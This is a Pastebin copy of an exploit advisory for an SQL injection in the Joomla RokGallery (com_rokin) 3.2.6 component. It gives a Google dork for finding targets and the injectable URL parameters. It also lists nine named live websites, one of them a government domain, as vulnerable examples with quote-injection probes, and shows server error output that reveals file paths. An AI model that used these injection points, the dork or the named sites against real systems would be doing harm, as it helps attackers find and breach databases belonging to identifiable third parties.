Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Rokin RokGallery Components 3.2.6 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : rockettheme.com
- # Software Download Link : rockettheme.com/joomla/extensions/rokgallery
- # Software Information Link : extensions.joomla.org/extension/rokgallery/
- # Software Version : 3.2.6
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_rokin''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010299
- packetstormsecurity.com/files/151434/Joomla-Rokin-RokGallery-3.2.6-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- RokGallery is a ground-up revolutionary gallery extension, developed to be
- hugely flexible, versatile and user friendly.
- The system itself is built on a custom tag-based architecture
- with the ability to have multiple tag-based galleries.
- ####################################################################
- # Impact :
- ***********
- Joomla Rokin RokGallery 3.2.6 component for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_rokin&Itemid=[SQL Injection]
- /index.php?option=com_rokin&unit=gallery&act=show&Itemid=[SQL Injection]
- /index.php?option=com_rokin&Itemid=[ID-NUMBER]
- &unit=photo&act=show&albumid=[SQL Injection]
- /index.php?option=com_rokin&Itemid=[ID-NUMBER]
- &unit=photo&act=show&albumid=[ID-NUMBER]&photoid=[SQL Injection]
- /index.php?option=com_rokin&Itemid=[ID-NUMBER]
- &unit=album&act=show&albumid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] tcpghana.gov.gh/index.php?option=com_rokin&Itemid=165
- [+] adezn.org/index.php?option=com_rokin&unit=gallery&act=show&Itemid=77
- [+] rugbywinterthur.ch/rcwinti/index.php?option=com_rokin&Itemid=
- 2&unit=photo&act=show&albumid=23%27
- [+] canada-club-geneva.com/cms/index.php?option=com_rokin&Itemid=
- 63&unit=photo&act=show&albumid=9&photoid=1%27
- [+] transportesarv.com.ec/web/index.php?option=com_rokin
- &Itemid=88&unit=album&act=show&albumid=1%27
- [+] muskaria.com/index.php?option=com_rokin&Itemid=
- &unit=photo&act=show&albumid=198&photoid=%27
- [+] neun-bowlers.mwis.de/index.php?option=com_rokin&Itemid=54%27
- [+] clnm.org/en/index.php?option=com_rokin&Itemid=
- 56&unit=photo&act=show&albumid=8&photoid=%27
- [+] ilpulcino.org/index.php?option=com_rokin&Itemid=
- 121&unit=album&act=show&albumid=%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: preg_replace(): The /e modifier is deprecated, use
- preg_replace_callback instead in /home/transp15/public_html
- /web/libraries/joomla/filter/filterinput.php on line 512
- Strict Standards: Non-static method JLoader::import() should not
- be called statically in /home/transp15/public_html
- /web/libraries/loader.php on line 186
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment